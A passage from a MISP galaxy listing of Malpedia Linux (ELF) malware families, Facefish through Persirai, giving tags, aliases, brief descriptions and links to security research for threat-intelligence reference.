The tag is: misp-galaxy:malpedia="Facefish"

Facefish is also known as:

Table 997. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.facefish
https://blog.netlab.360.com/ssh_stealer_facefish_en/

FBot

The tag is: misp-galaxy:malpedia="FBot"

FBot is also known as:

Table 998. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot
https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html
https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html
https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/
https://blog.netlab.360.com/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/

FinFisher (ELF)

The tag is: misp-galaxy:malpedia="FinFisher (ELF)"

FinFisher (ELF) is also known as:

Table 999. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.finfisher
https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/
https://securelist.com/finspy-unseen-findings/104322/
https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/

floodor

The tag is: misp-galaxy:malpedia="floodor"

floodor is also known as:

Table 1000. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.floodor
https://github.com/Thibault-69/Floodor

FontOnLake

This family utilizes custom modules allowing for remote access, credential harvesting (e.g. by modifying sshd) and proxy usage.

It comes with a rootkit as well.

The tag is: misp-galaxy:malpedia="FontOnLake"

FontOnLake is also known as:

Table 1001. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.fontonlake
https://www.welivesecurity.com/2021/10/07/fontonlake-previously-unknown-malware-family-targeting-linux/

FritzFrog

Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk.

The tag is: misp-galaxy:malpedia="FritzFrog"

FritzFrog is also known as:

Table 1002. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

Gitpaste-12

The tag is: misp-galaxy:malpedia="Gitpaste-12"

Gitpaste-12 is also known as:

Table 1003. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.gitpaste12
https://blogs.juniper.net/en-us/threat-research/gitpaste-12

Godlua

The tag is: misp-galaxy:malpedia="Godlua"

Godlua is also known as:

Table 1004. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.godlua
https://blog.netlab.360.com/an-analysis-of-godlua-backdoor-en/

GOSH

The tag is: misp-galaxy:malpedia="GOSH"

GOSH is also known as:

Table 1005. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.gosh
https://twitter.com/IntezerLabs/status/1291355808811409408

GreedyAntd

The tag is: misp-galaxy:malpedia="GreedyAntd"

GreedyAntd is also known as:

Table 1006. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.greedyantd
https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/

HabitsRAT (ELF)

The tag is: misp-galaxy:malpedia="HabitsRAT (ELF)"

HabitsRAT (ELF) is also known as:

Table 1007. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.habitsrat
https://twitter.com/michalmalik/status/1435918937162715139

Haiduc

The tag is: misp-galaxy:malpedia="Haiduc"

Haiduc is also known as:

Table 1008. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.haiduc
https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf

Hajime

The tag is: misp-galaxy:malpedia="Hajime"

Hajime is also known as:

Table 1009. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime
https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf
https://par.nsf.gov/servlets/purl/10096257
https://x86.re/blog/hajime-a-follow-up/
http://blog.netlab.360.com/hajime-status-report-en/
https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things
https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461
https://blog.netlab.360.com/quick-summary-port-8291-scan-en/
https://github.com/Psychotropos/hajime_hashes

Hakai

The tag is: misp-galaxy:malpedia="Hakai"

Hakai is also known as:

Table 1010. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai
https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/

HandyMannyPot

The tag is: misp-galaxy:malpedia="HandyMannyPot"

HandyMannyPot is also known as:

Table 1011. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.handymannypot
https://twitter.com/liuya0904/status/1171633662502350848

Hand of Thief

The tag is: misp-galaxy:malpedia="Hand of Thief"

Hand of Thief is also known as:

Hanthie

Table 1012. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.hand_of_thief
https://blog.avast.com/2013/08/27/linux-trojan-hand-of-thief-ungloved/
https://web.archive.org/web/20130815040638/https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thief-trojan-targets-linux-inth3wild/

HelloKitty (ELF)

Linux version of the HelloKitty ransomware.

The tag is: misp-galaxy:malpedia="HelloKitty (ELF)"

HelloKitty (ELF) is also known as:

Table 1013. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.hellokitty
https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html
https://www.bleepingcomputer.com/news/security/linux-version-of-hellokitty-ransomware-targets-vmware-esxi-servers/
https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

HiddenWasp

The tag is: misp-galaxy:malpedia="HiddenWasp"

HiddenWasp is also known as:

Table 1014. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiddenwasp
https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought
https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/

Hide and Seek

The tag is: misp-galaxy:malpedia="Hide and Seek"

Hide and Seek is also known as:

Table 1015. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek
https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/
https://threatlabs.avast.com/botnet
https://blog.avast.com/hide-n-seek-botnet-continues
https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/
https://blog.netlab.360.com/hns-botnet-recent-activities-en/
https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/
https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/
https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/
https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code—hide—n-seek-bot.html

Hubnr

The tag is: misp-galaxy:malpedia="Hubnr"

Hubnr is also known as:

Table 1016. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.hubnr
https://github.com/carbreal/Malware_Analysis/tree/master/Hubnr_botnet

Icnanker

The tag is: misp-galaxy:malpedia="Icnanker"

Icnanker is also known as:

Table 1017. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.icnanker
https://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/

IoT Reaper

The tag is: misp-galaxy:malpedia="IoT Reaper"

IoT Reaper is also known as:

IoTroop
Reaper
iotreaper

Table 1018. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper
http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/
https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm
https://research.checkpoint.com/new-iot-botnet-storm-coming/

IPStorm (ELF)

The tag is: misp-galaxy:malpedia="IPStorm (ELF)"

IPStorm (ELF) is also known as:

InterPlanetary Storm

Table 1019. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.ipstorm
https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network
https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

JenX

The tag is: misp-galaxy:malpedia="JenX"

JenX is also known as:

Table 1020. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx
https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/

Kaiji

Surfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.

The tag is: misp-galaxy:malpedia="Kaiji"

Kaiji is also known as:

Table 1021. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji
https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775
https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/
https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/

Kaiten

The tag is: misp-galaxy:malpedia="Kaiten"

Kaiten is also known as:

Table 1022. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten
https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf
https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html
https://www.lacework.com/the-kek-security-network/
https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/

kerberods

The tag is: misp-galaxy:malpedia="kerberods"

kerberods is also known as:

Table 1023. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.kerberods
https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916
https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/
https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html
https://blog.talosintelligence.com/2019/09/watchbog-patching.html
https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang

kfos

The tag is: misp-galaxy:malpedia="kfos"

kfos is also known as:

Table 1024. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.kfos
https://twitter.com/r3dbU7z/status/1378564694462586880

Kinsing

The tag is: misp-galaxy:malpedia="Kinsing"

Kinsing is also known as:

h2miner

Table 1025. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://unit42.paloaltonetworks.com/cve-2020-25213/
https://redcanary.com/blog/kinsing-malware-citrix-saltstack/
https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces
https://twitter.com/IntezerLabs/status/1259818964848386048
https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775
https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743
https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html
https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability
https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html

KIVARS (ELF)

The tag is: misp-galaxy:malpedia="KIVARS (ELF)"

KIVARS (ELF) is also known as:

Table 1026. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.kivars
https://www.trendmicro.com/en_us/research/16/c/threat-actors-behind-shrouded-crossbow-creates-bifrose-for-unix.html

Kobalos

The tag is: misp-galaxy:malpedia="Kobalos"

Kobalos is also known as:

Table 1027. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos
https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/
https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf
https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf
https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/

Lady

The tag is: misp-galaxy:malpedia="Lady"

Lady is also known as:

Table 1028. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady
https://news.drweb.com/news/?i=10140&lng=en

LeetHozer

The tag is: misp-galaxy:malpedia="LeetHozer"

LeetHozer is also known as:

Table 1029. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.leethozer
https://blog.netlab.360.com/the-leethozer-botnet-en/

LiLock

The tag is: misp-galaxy:malpedia="LiLock"

LiLock is also known as:

Lilocked
Lilu

Table 1030. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilock
https://www.bleepingcomputer.com/news/security/lilocked-ransomware-actively-targeting-servers-and-web-sites/
https://fossbytes.com/lilocked-ransomware-infected-linux-servers/
https://id-ransomware.blogspot.com/2019/07/lilu-lilocked-ransomware.html

lilyofthevalley

The tag is: misp-galaxy:malpedia="lilyofthevalley"

lilyofthevalley is also known as:

Table 1031. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilyofthevalley
https://github.com/En14c/LilyOfTheValley

LiquorBot

BitDefender tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features. Interestingly, LiquorBot is written in Go (also known as Golang), which offers some programming advantages over traditional C-style code, such as memory safety, garbage collection, structural typing, and even CSP-style concurrency.

The tag is: misp-galaxy:malpedia="LiquorBot"

LiquorBot is also known as:

Table 1032. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.liquorbot
https://www.zdnet.com/article/naive-iot-botnet-wastes-its-time-mining-cryptocurrency/
https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/

Loerbas

Loader and Cleaner components used in attacks against high-performance computing centers in Europe.

The tag is: misp-galaxy:malpedia="Loerbas"

Loerbas is also known as:

Table 1033. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.loerbas
https://atdotde.blogspot.com/2020/05/high-performance-hackers.html
https://twitter.com/nunohaien/status/1261281419483140096
https://www.cadosecurity.com/2020/05/16/1318/

Log Collector

The tag is: misp-galaxy:malpedia="Log Collector"

Log Collector is also known as:

Table 1034. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.log_collector
https://blog.netlab.360.com/dacls-the-dual-platform-rat/

Lootwodniw

The tag is: misp-galaxy:malpedia="Lootwodniw"

Lootwodniw is also known as:

Table 1035. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.lootwodniw
https://twitter.com/ddash_ct/status/1326887125103616000

Masuta

Masuta takes advantage of the EDB 38722 D-Link exploit.

The tag is: misp-galaxy:malpedia="Masuta"

Masuta is also known as:

PureMasuta

Table 1036. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta
https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/
https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7
https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes

Matryosh

The tag is: misp-galaxy:malpedia="Matryosh"

Matryosh is also known as:

Table 1037. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.matryosh
https://blog.netlab.360.com/matryosh-botnet-is-spreading-en/

MESSAGETAP

MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. It is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft.

The tag is: misp-galaxy:malpedia="MESSAGETAP"

MESSAGETAP is also known as:

Table 1038. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.messagetap
https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought

Midrashim

A x64 ELF file infector with non-destructive payload.

The tag is: misp-galaxy:malpedia="Midrashim"

Midrashim is also known as:

Table 1039. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.midrashim
https://www.guitmz.com/linux-midrashim-elf-virus/
https://github.com/guitmz/midrashim

MiKey

The tag is: misp-galaxy:malpedia="MiKey"

MiKey is also known as:

Table 1040. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey
https://securitykitten.github.io/2016/12/14/mikey.html

Mirai (ELF)

Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.

The tag is: misp-galaxy:malpedia="Mirai (ELF)"

Mirai (ELF) is also known as:

Katana

Table 1041. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html
http://osint.bambenekconsulting.com/feeds/
https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/
https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/
https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/
https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/
https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx
https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html
https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/
https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/
https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/
https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group
https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/
https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/
https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt
https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space
https://isc.sans.edu/diary/22786
https://github.com/jgamblin/Mirai-Source-Code
https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/
https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/
https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants
https://www.youtube.com/watch?v=KVJyYTie-Dc
https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/
https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/
https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet
https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/
https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
https://synthesis.to/2021/06/30/automating_string_decryption.html
http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/
https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/
https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/

Mokes (ELF)

The tag is: misp-galaxy:malpedia="Mokes (ELF)"

Mokes (ELF) is also known as:

Table 1042. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes
https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/

Momentum

The tag is: misp-galaxy:malpedia="Momentum"

Momentum is also known as:

Table 1043. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.momentum
https://www.trendmicro.com/en_us/research/19/l/ddos-attacks-and-iot-exploits-new-activity-from-momentum-botnet.html

MooBot

The tag is: misp-galaxy:malpedia="MooBot"

MooBot is also known as:

Table 1044. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
https://blog.netlab.360.com/ddos-botnet-moobot-en/
https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/
https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b

Moose

The tag is: misp-galaxy:malpedia="Moose"

Moose is also known as:

Table 1045. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose
https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Paquet-Clouston.pdf
http://www.welivesecurity.com/2015/05/26/moose-router-worm/
http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/
http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/

Mozi

The tag is: misp-galaxy:malpedia="Mozi"

Mozi is also known as:

Table 1046. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi
https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet
https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/
https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/
https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/
https://www.nozominetworks.com/blog/overcoming-the-challenges-of-detecting-p2p-botnets-on-your-network/
https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
https://blog.netlab.360.com/mozi-another-botnet-using-dht/

MrBlack

The tag is: misp-galaxy:malpedia="MrBlack"

MrBlack is also known as:

Table 1047. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack
https://news.drweb.com/?i=5760&c=23&lng=en

Nextcry

Ransomware used against Linux servers.

The tag is: misp-galaxy:malpedia="Nextcry"

Nextcry is also known as:

Table 1048. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.nextcry
https://www.bleepingcomputer.com/news/security/new-nextcry-ransomware-encrypts-data-on-nextcloud-linux-servers/

Ngioweb (ELF)

The tag is: misp-galaxy:malpedia="Ngioweb (ELF)"

Ngioweb (ELF) is also known as:

Table 1049. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.ngioweb
https://twitter.com/IntezerLabs/status/1324346324683206657
https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/
https://blog.netlab.360.com/linux-ngioweb-v2-going-after-iot-devices-en/

NiuB

Golang-based RAT that offers execution of shell commands and download+run capability.

The tag is: misp-galaxy:malpedia="NiuB"

NiuB is also known as:

Table 1050. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.niub
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://labs.bitdefender.com/2020/10/theres-a-new-a-golang-written-rat-in-town/

NOTROBIN

FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

The tag is: misp-galaxy:malpedia="NOTROBIN"

NOTROBIN is also known as:

remove_bds

Table 1051. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin
https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://news.sophos.com/en-us/2020/05/21/asnarok2/
https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/
https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html
https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought
https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/
https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html

Owari

Mirai variant by actor "Anarchy" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.

The tag is: misp-galaxy:malpedia="Owari"

Owari is also known as:

Table 1052. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari
https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html
https://twitter.com/360Netlab/status/1019759516789821441
https://twitter.com/hrbrmstr/status/1019922651203227653
https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863
https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/
https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/
https://twitter.com/ankit_anubhav/status/1019647993547550720

p0sT5n1F3r

According to Yarix digital security, this is a malware that allows to sniff on HTTPS traffic, implemented as Apache module.

The tag is: misp-galaxy:malpedia="p0sT5n1F3r"

p0sT5n1F3r is also known as:

Table 1053. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.p0st5n1f3r
https://www.vargroup.it/wp-content/uploads/2019/10/ReverseEngineering_SecurityReport_EN_2019.10.16-2.pdf

pbot

P2P botnet derived from the Mirai source code.

The tag is: misp-galaxy:malpedia="pbot"

pbot is also known as:

Table 1054. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.pbot
https://www.cert.org.cn/publish/main/11/2021/20210628133948926376206/20210628133948926376206_.html

Penquin Turla

The tag is: misp-galaxy:malpedia="Penquin Turla"

Penquin Turla is also known as:

Table 1055. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf
https://securelist.com/big-threats-using-code-similarity-part-1/97239/
https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/
https://securelist.com/apt-trends-report-q2-2020/97937/
https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf
https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf
https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf
https://www.youtube.com/watch?v=JXsjRUxx47E
https://twitter.com/juanandres_gs/status/944741575837528064

PerlBot

The tag is: misp-galaxy:malpedia="PerlBot"

PerlBot is also known as:

DDoS Perl IrcBot
ShellBot

Table 1056. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot
https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf
https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf
https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/
https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://twitter.com/Nocturnus/status/1308430959512092673
https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/
https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/

Persirai

The tag is: misp-galaxy:malpedia="Persirai"

Persirai is also known as:

Table 1057. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai
http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/

PLEAD (ELF)

